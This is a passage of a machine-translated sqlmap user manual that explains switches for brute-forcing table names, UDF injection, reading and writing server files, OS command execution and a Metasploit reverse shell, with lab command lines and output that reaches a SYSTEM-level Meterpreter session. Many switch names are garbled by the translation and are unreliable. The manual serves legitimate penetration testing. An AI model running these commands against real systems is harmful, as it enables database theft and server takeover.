If any of the first two scenarios appears and you turn on the -- tables switch, sqlmap will prompt you whether to use brute force cracking technology. Therefore, even if one of the above two scenarios occurs, as long as you turn on -- common tables, sqlmap can still identify some system data tables. Sqlmap will try to brutally crack the system tables and try to find out the common data tables in DBMS.

The list of common data table names is stored in txt / common tables Txt, which supports users to modify arbitrarily.

Examples of MySQL 4.1 targets:

$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --commo\
n-tables -D testdb --banner

[...]
[hh:mm:39] [INFO] testing MySQL
[hh:mm:39] [INFO] confirming MySQL
[hh:mm:40] [INFO] the back-end DBMS is MySQL
[hh:mm:40] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS operating system: Windows
back-end DBMS: MySQL < 5.0.0
banner:    '4.1.21-community-nt'

[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/tx
t/common-tables.txt'
[hh:mm:40] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[hh:mm:43] [INFO] retrieved: users

Database: testdb
[1 table]
+-------+
| users |
+-------+

Brute force crack listing

Switch: - Common columns

For any data table, you may not be able to obtain the column names of the database table after turning on the switch columns. Such scenarios usually occur in the following situations:

• DBMS is MySQL version < 5.0, and they do not have information_schema.
• DBMS is Microsoft's Access database, and the corresponding column name information does not exist in the database system table.
• The current session user does not have read permission to the system table defined by the data table stored in the DBMS.

If any of the first two scenarios appears and you turn on the -- columns switch, sqlmap will prompt you whether to use brute force cracking technology. Therefore, even if one of the above two scenarios occurs, as long as you turn on -- common columns, sqlmap can still identify some system data tables. Sqlmap will try to brutally crack the system table and try to find the common data table column names in DBMS.

The list of common data table names is stored in txt / common columns Txt, which supports users to modify arbitrarily.

User defined function injection

The following options are used to create user-defined functions.

Inject user defined function (UDF)

Switches and options: - UDF inject and -- shared Lib

You can inject your own user-defined functions (UDFs) by compiling MySQL or PostgreSQL shared libraries (DLL s on Windows and shared object s on Linux/Unix), and then provide the directory path of the local storage shared library to sqlmap. Sqlmap will decide whether to upload the shared library to the database server file system or create user-defined functions according to your choice. When you finish injecting UDFs, sqlmap can also delete them from the database.

These technologies are described in the white paper Fully control the operating system through advanced SQL injection It is described in detail in.

Use the option -- UDF inject and follow the instructions.

If necessary, you can also use the -- shared lib option to specify the local file system path of the shared library through the command line. Otherwise, sqlmap will ask you for the path at runtime.

This function is only useful when the DBMS is MySQL or PostgreSQL.

Access file system

Read database server file system files

Options: - file read

When the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server, and the current session user has the permission to take advantage of the specific functions of the database and related architecture weaknesses, sqlmap can directly read the contents of the files in the underlying file system. Files can be text files or binary files, and sqlmap can correctly handle related files.

Details of these technologies can be found in the white paper Fully control the operating system through advanced SQL injection.

The following is an example of obtaining binary files with Microsoft SQL Server 2005 as the target:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?nam\
e=luther" --file-read "C:/example.exe" -v 1

[...]
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to:    '/software/sqlmap/output/192.168.136.129/files/
C__example.exe'
[...]

$ ls -l output/192.168.136.129/files/C__example.exe 
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C_
_example.exe

$ file output/192.168.136.129/files/C__example.exe 
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI
) Intel 80386 32-bit

Upload files to the file system of the database server

Options: - file write and -- File dest

When the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server, and the current session user has the permission to take advantage of the specific functions of the database and related architecture weaknesses, sqlmap can upload a local file to the database server file system. Files can be text files or binary files, and sqlmap can correctly handle related files.

Details of these technologies can be found in the white paper Fully control the operating system through advanced SQL injection.

The following is an example of submitting a UPX compressed binary file to the server with MySQL as the target:

$ file /software/nc.exe.packed 
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32
-bit

$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" -\
-file-write "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1

[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0

[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been success
fully written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 b
ytes, same size as the local file '/software/nc.exe.packed'

Take over the operating system

Run any operating system command

Options and switches: -- OS CMD and -- OS shell

When the backend DBMS is MySQL, PostgreSQL or Microsoft SQL Server, and the current session user has the permission to use the specific functions and related architecture features of the database, sqlmap can run any command on the operating system of the server where the database is located.

In MySQL and PostgreSQL, sqlmap can be uploaded (through the file upload function described above). One contains two user-defined functions - sys_exec() and sys_ The shared library (binary file) of Eval (), and then create two corresponding functions in the database, call the corresponding functions to execute specific commands, and allow users to choose whether to print the execution results of relevant commands. In Microsoft SQL server, sqlmap uses xp_cmdshell stored procedure: if the stored procedure is closed (closed by default in 2005 and above versions of Microsoft SQL Server), sqlmap will reopen it; If the stored procedure does not exist, sqlmap recreates it.

When the user requests standard output, sqlmap will use any available SQL Injection Technology (blind injection, in band injection, error reporting injection) to obtain the corresponding results. On the contrary, if there is no need for standard output corresponding results, sqlmap will use heap query injection technology to execute relevant commands.

Details of these technologies can be found in the white paper Fully control the operating system through advanced SQL injection.

Example for PostgreSQL target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --\
os-cmd id -v 1

[...]
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:    'uid=104(postgres) gid=106(postgres) groups=106(post
gres)'

[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file sys
tem can only be deleted manually

sqlmap also supports simulated shell input. You can enter any command to execute. The corresponding option is -- OS shell, and like -- SQL shell, it has the functions of TAB completion and recording history commands.

If the heap query is not recognized by the Web application (for example, PHP or ASP, and the back-end DBMS is MySQL), and the DBMS is mysql, if the back-end DBMS and the Web server are on the same server, you can still create a Web back door in the writable directory in the root directory of the Web server by using INTO OUTFILE in the SELECT statement, so as to execute the command. sqlmap supports the above functions and allows users to provide a comma separated list of subdirectories used to specify the root directory, so as to try to upload the Web file conveyor and subsequent Web backdoors. sqlmap has Web file transporters and Backdoors in the following languages:

• ASP
• ASP.NET
• JSP
• PHP

Stateful out of band connections: meterpreter & Friends

Switches and options: - OS PWN, - OS smbrelay, - OS BOF, - priv ESC, - MSF path and -- TMP path

When the backend DBMS is MySQL, PostgreSQL or Microsoft SQL Server, and the current session user has the permission to exploit the specific functions and architecture defects of the database, sqlmap can establish a stateful out of band TCP connection between the attacker machine and the database server. Depending on the user's choice, the connection can be an interactive command line, a Meterpreter session, or a graphical user interface (VNC) session.

sqlmap relies on Metasploit to create shellcode and implements four different technologies to execute it on the database server. These technologies are:

• Through the user-defined function sys of sqlmap_ Bineval() executes Metasploit shellcode in database memory. MySQL and PostgreSQL support this technology, which is enabled through the switch --os-pwn.
• Through the user-defined function sys of sqlmap_ Exec() uploads a Metasploit independent payload transport to MySQL and PostgreSQL and executes it. For Microsoft SQL Server, XP is used_ Cmdshell() function, enabled by switch --os-pwn.
• SMB reflection attack via UNC path request from database server to attacker machine (monitored by Metasploit smb_relay service)( MS08-068 )To execute Metasploit shellcode. When sqlmap runs on Linux/Unix with high permissions (uid=0) and the target DBMS runs as a Windows administrator, it supports this technology and is enabled through the switch -- OS smbray.
• By leveraging SP of Microsoft SQL Server 2000 and 2005_ Replwritetovarbin stored procedure Heap Buffer Overflow( MS09-004 )Execute Metasploit shellcode in database memory. sqlmap uses its own exploit to automatically bypass DEP memory protection to trigger the vulnerability, but it relies on Metasploit to generate shellcode for execution upon successful exploitation, which is enabled through the switch -- OS BOF.

Relevant technical details can be found in the white paper Fully control the operating system through advanced SQL injection And slides Expand control from database level to operating system.

Example for MySQL target:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?\
id=1" --os-pwn --msf-path /software/metasploit

[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database und
erlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
> 
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on 
all ports 
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
> 
which is the local address? [192.168.136.1] 
which local port number do you want to use? [60641] 
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, p
lease wait..

                                _
                                | |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                        /|
                        \|


    =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
    =[ svn r12272 updated 4 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641 
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_b
ineval', please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) a
t Mon Apr 11 hh:mm:52 +0100 2011

meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The 'priv' extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Computer        : W2K3R2
Architecture    : x86
Meterpreter     : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0



Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address  : 192.168.136.129
Netmask     : 255.255.255.0


meterpreter > exit

[*] Meterpreter session 1 closed.  Reason: User exit

By default, MySQL runs as SYSTEM on Windows, while PostgreSQL runs as a low privilege user postgres on Windows and Linux. Microsoft SQL Server 2000 runs as SYSTEM by default, while Microsoft SQL 2005 and 2008 run as NETWORK SERVICE in most cases and LOCAL SERVICE in some cases.

Using the -- priv ESC switch of sqlmap, the database process user rights can be raised through the Metasploit getsystem command, which uses the following functions: kitrap0d Various technologies including( MS10-015).

Access the Windows registry

When the backend DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the Web application supports heap query, sqlmap can access the Windows registry. In addition, session users must have corresponding access rights.

Read Windows registry key

Switch: - reg read

Use this switch to read registry keys.

Write Windows registry key

Switch: - reg add

Use this switch to write registry keys.

Delete Windows registry key

Switch: - reg del

Use this switch to delete a registry key.

Registry accessibility options

Options: - reg key, - reg value, - reg data and -- reg type

These options are used to provide the data needed to properly run switches such as -- reg read, - reg add, and -- reg del. Therefore, you can use them as program parameters at the command prompt instead of providing registry key information during execution.

Use the -- reg key option to specify the Windows registry key path, - reg value provides the name of the registry key, - reg data provides the registry key data, and the -- reg type option specifies the type of registry key.

An example command line for adding a registry key hive is as follows:

$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --r\
eg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-ty\
pe=REG_SZ --reg-data=1

general option

The following options are used to set the general parameters of sqlmap.

Read session from stored (. sqlite) file

Options: - s

sqlmap will automatically establish a persistent session SQLite file for each target in a dedicated output directory, which will store all data used to recover the session. If the user needs to specify the specific storage location of the session file (for example, store the session data of all targets in the same location), you can use this option.

Record HTTP(s) access information to a text file

Options: - t

This option requires a parameter specifying the address of the text file, which is used to write all HTTP (s) traffic information generated by sqlmap -- including HTTP (s) requests and HTTP (s) responses.

This option is mainly used for debugging - you can bring this file with you when you provide potential bug reports to developers.

Run in non interactive mode

Switch: - batch

When you need to run sqlmap in batch mode to avoid any user intervention in the operation of sqlmap, you can force the switch -- batch. In this way, when sqlmap needs user input information, it will run with default parameters.

Binary content retrieval

Options: - binary fields

In order to facilitate the retrieval of the contents of the data table field storing binary values (for example, the data column password stores the binary data of password hash value), the -- binary fields option can be used to process the data column appropriately (additionally). All these data fields (e.g. columns of data table) will be taken out and displayed in hexadecimal format for subsequent processing by other tools (e.g. john).

Custom SQL (blind) injection character set

Options: - charset

In Boolean blind annotation and temporal blind annotation, users can force the use of custom character sets to speed up the data retrieval process. For example, when exporting the message digest value (e.g. SHA1), by using (e.g.) -- charset="0123456789abcdef", the expected number of requests is about 30% less than the normal operation.

Crawl the site from the target URL

Options: - crawl

Sqlmap can collect (crawl) links with potential vulnerabilities from a given target site. Use this option to set the crawling depth (the distance to the starting position), so that the sqlmap crawling to the corresponding depth will not continue.

Running example for MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
[...]
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 links visited (75%)
[...]

Options: - crawl exclude

Use this option to exclude pages you don't want to grab through regular expressions. For example, if you want to skip all links that contain the logout keyword, you can use -- crawl exclude = logout.

Specifies the separator for CSV output

Options: - CSV del

When exporting data to a CSV format file (- - dump format = CSV), data entries need to be divided using a "separator" (default,). You can use this option if you want to override the default delimiter (for example: -- CSV del = ";").

DBMS authentication certificate

Options: - DBMS cred

In some cases, the user may fail the operation due to the permission of the current DBMS user. This option can be used at this time. In this scenario, if the user uses this option to admin user credentials, sqlmap will try to run again using the corresponding authentication information and the "run as other identity" mechanism (for example, OPENROWSET of Microsoft SQL Server).

Format of exported data

Options: - dump format

When exporting data table data to corresponding files in the output directory, sqlmap supports three different data export formats: CSV, HTML and SQLITE. The default output format is CSV. Each piece of data is stored in a text file line by line with (or use -- CSV del to specify other symbols) as separator. If the HTML format is used, the output will be stored as an HTML file, and each row of data will be stored as a row of the table into the HTML file. If SQLITE is used, the data will be stored in the SQLITE database, and the original data table will be converted into a SQLITE data table with the same name.

Force specified retrieval data encoding

Options: - encoding

In order to encode the character data reasonably, sqlmap uses the information provided from the Web server (for example, HTTP request header content type), or uses a third-party library chardet Derivation.

However, it is sometimes necessary to specify the encoding, especially when the obtained data contains international non ASCII characters (for example: encoding=GBK). At the same time, it should be noted that if the data content stored in the target machine database is incompatible with the database connector code, the coding information will be irreversibly lost.

Estimated completion time

Switch: - eta

SQL map supports real-time calculation and display of the estimated time to obtain query results. If the technology used is any kind of SQL blind injection, the time to obtain the output is displayed.

Examples of Boolean blind injection for Oracle targets:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id\
=1" -b --eta

[...]
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========>                                          ] 11/64  ETA 00:19

next:

100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2
.0.1.0 - Prod

web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

As can be seen from the above, sqlmap will first calculate the length of the query result, then estimate the completion time, and display the percentage of completion and the number of characters received.

Empty session file

Options: - Flush session

After the above description, I believe you are familiar with the related concepts of session file. It is worth noting that you can empty the contents of session file through the option -- flush session. In this way, you can avoid the default caching mechanism of sqlmap. You can also manually remove the relevant session files.

Parse and test form input fields

Switch: - forms

For example, you need to conduct SQL injection test for the search box, or you want to bypass login verification (usually username and password input boxes). You can pass in the request file (- r) to sqlmap and set the (- - data) related submission data, or directly let sqlmap automatically complete the relevant operations for you.

The two examples mentioned above, as well as the < form > and < input > tags appearing in other HTML response bodies, can use this switch.

Use the -- forms switch of sqlmap in conjunction with the target URL (- u) of the existing form. Sqlmap will automatically request the corresponding target URL for you, parse the relevant form, and guide you to conduct SQL injection test based on the form input field (parameter) rather than the provided target URL.

Ignore query results in session file

Switch: - fresh queries

After the above description, I believe you are familiar with the concept of session file. It is worth noting that you can use the -- fresh queries switch to ignore the specified session file. In this way, you can keep the specific session file content of a run unchanged, so as to avoid repeated attempts / restores of query results.

Get data using DBMS hex function

Switch: -- hex

In many cases, there are special requirements for obtaining non ASCII data. One solution is to use the DBMS hex function. When this switch is turned on, the data will be encoded into hexadecimal format before being obtained, and then decoded into the original format.

Examples for PostgreSQL targets:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --b\
anner --hex -v 3 --parse-errors

[...]
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR
(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)
))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(
CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'
>function.pg-query</a>]: Query failed: ERROR:  invalid input syntax for type num
eric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d
676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c20284465626961
6e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.p
hp</b> on line <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by 
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
[...]

Specify the output directory path

Options: - output dir

By default, sqlmap stores the session and result files in a subdirectory named output. If you want to use different storage locations, you can use this option (for example: -- output dir = / tmp).

Parsing DBMS error information from the response page

Switch: - parse errors

If the debugging mode is configured for the Web application, the error information of the backend DBMS will be displayed in the HTTP response request, which will be parsed and displayed by sqlmap.

This feature is very useful for debugging. For example, it can be used to understand why a specific enumeration or takeover switch fails - it may be that the session user has permission problems. In this case, you can see the DBMS error message of access denied for user < session user >.

Examples for Microsoft SQL Server targets:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"\
 --parse-errors
[...]
[xx:xx:17] [INFO] ORDER BY technique seems to be usable. This should reduce the 
timeneeded to find the right number of query columns. Automatically extending th
e rangefor current UNION query injection technique test
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
ers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 i
s out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
ers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is
 out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
ers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is
 out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] target URL appears to have 3 columns in query
[...]

Save relevant options to INI configuration file

Options: - save

You can save the relevant options on the command line to the INI configuration file. At the same time, the generated file can be edited through the - c option described above.

Update sqlmap

Switch: - update

Using this switch, you can directly Git warehouse Upgrade the tool to the latest development version. Of course, you need a network connection.

Of course, if the above operation fails, you can directly run git pull in the directory where sqlmap is located. The execution effect is the same as using the switch update. If you are using sqlmap on Windows, you can use SmartGit client.

In the direction mailing list Before giving feedback on any potential bug s, it is strongly recommended to try the methods described above.

miscellaneous

Use short mnemonics

Options: - z

Entering all the options and switches you want to use is tedious, especially for those commonly used options and switches (for example: -- batch -- random agent -- ignore proxy -- technique = beu). There is a shorter way to deal with this problem. In sqlmap, it is called mnemonic.

With option-z, each option and switch can be in the form of a shorter mnemonic separated by commas (,), where the mnemonic represents the first arbitrarily selected part of the original name. Options and switches are not strictly mapped to their respective reduced parts. The only condition to be met is that no other options and switches use the same prefix.

For example:

$ python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "ww\
w.target.com/vuln.php?id=1"

It can be written in short mnemonic form (one of many methods):

$ python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=\
1"

Another example:

$ python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testd\
b -T users -u "www.target.com/vuln.php?id=1"

It can be written in short mnemonic form:

$ python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.\
com/vuln.php?id=1"

Warning successful SQL injection detection

Options: - alert

Set answers to questions

Options: - answers

If users want to answer questions automatically, even if the -- batch option is used, they can do this by providing part of the questions and corresponding answers after the equal sign. In addition, answers to different questions can be separated by separators.

Example for MySQL target:

$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--te\
chnique=E --answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you 
want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provide
d level (1) and risk (1)? [Y/n] N
[...]

Beep when SQL injection is found

Switch: - beep

If the user uses the switch -- beep, sqlmap will immediately beep when SQL injection is found. This is particularly useful when the target URLs for the test are a large list (option - m).

Clear the specific sqlmap UDF(s) and tables in the DBMS

Switch: - cleanup

It is recommended to clean up the sqlmap temporary table and user-defined functions in the backend DBMS after taking over the underlying operating system or file system. Using the -- cleanup switch will clean up the DBMS and file system as much as possible.

Check dependencies

Switch: - dependencies

In some special cases, sqlmap needs to install additional third-party libraries independently (for example, option - d, switch - OS PWN for icmpsh tunnel, option - auth type for NTLM type HTTP authentication, etc.), Only in this special case will the user be warned. However, if you want to independently check all these additional third-party library dependencies, you can use the switch -- dependencies.

$ python sqlmap.py --dependencies
[...]
[xx:xx:28] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in
 order to directly connect to the DBMS Firebird. Download from http://kinterbasd
b.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord
er to directly connect to the DBMS Sybase. Download from http://pymssql.sourcefo
rge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python pymysql' third-party library in ord
er to directly connect to the DBMS MySQL. Download from https://github.com/peteh
unt/PyMySQL/
[xx:xx:28] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in o
rder to directly connect to the DBMS Oracle. Download from http://cx-oracle.sour
ceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-psycopg2' third-party library in or
der to directly connect to the DBMS PostgreSQL. Download from http://initd.org/p
sycopg/
[xx:xx:28] [WARNING] sqlmap requires 'python ibm-db' third-party library in orde
r to directly connect to the DBMS IBM DB2. Download from http://code.google.com/
p/ibm-db/
[xx:xx:28] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-pa
rty library in order to directly connect to the DBMS HSQLDB. Download from https
://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-pyodbc' third-party library in orde
r to directly connect to the DBMS Microsoft Access. Download from http://pyodbc.
googlecode.com/
[xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord
er to directly connect to the DBMS Microsoft SQL Server. Download from http://py
mssql.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-ntlm' third-party library if you pl
an to attack a web application behind NTLM authentication. Download from http://
code.google.com/p/python-ntlm/
[xx:xx:28] [WARNING] sqlmap requires 'websocket-client' third-party library if y
ou plan to attack a web application using WebSocket. Download from https://pypi.
python.org/pypi/websocket-client/

Disable console output shading

Switch: - Disable coloring

By default, shading is used when outputting sqlmap to the console. You can use this switch to disable the console output shading to avoid undesirable effects (for example, the shading effect of unresolved ANSI code in the console, such as \ x01\x1b[0;32m\x02[INFO]).

Google dork results using specific page numbers

Options: - gpage

By default, when the option - g is used, sqlmap will use the first 100 URLs from Google search for further SQL injection testing. Combined with this option, you can use it (- - gpage) to specify a page other than the first page to retrieve the target URLs.

Use HTTP parameter pollution

Switch: - hpp

HTTP parameter pollution (HPP) is a protection mechanism that bypasses WAF/IPS/IDS( here There is a relevant introduction) for ASP/IIS and ASP Net / IIS platform is especially effective. If you suspect that the target uses this protection mechanism, you can try using this switch to bypass it.

Pass the test for WAF/IPS/IDS protection

Switch: - identify WAF

sqlmap can try to identify the back-end WAF/IPS/IDS protection (if any), so that users can perform appropriate steps (for example, using tamper script through the option -- tamper). At present, about 30 different products (such as Airlock, barracuda, WAF, etc.) are supported. Their corresponding WAF scripts can be found in the WAF directory.

Example of MySQL target protected by ModSecurity WAF:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --i\
dentify-waf -v 3
[...]
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (Un
ited Security Providers)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application F
irewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Applicatio
n Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application 
Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisc
o Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)
'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Fi
rewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Ak
amai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application F
irewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application 
Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application F
irewall (Barracuda Networks)'
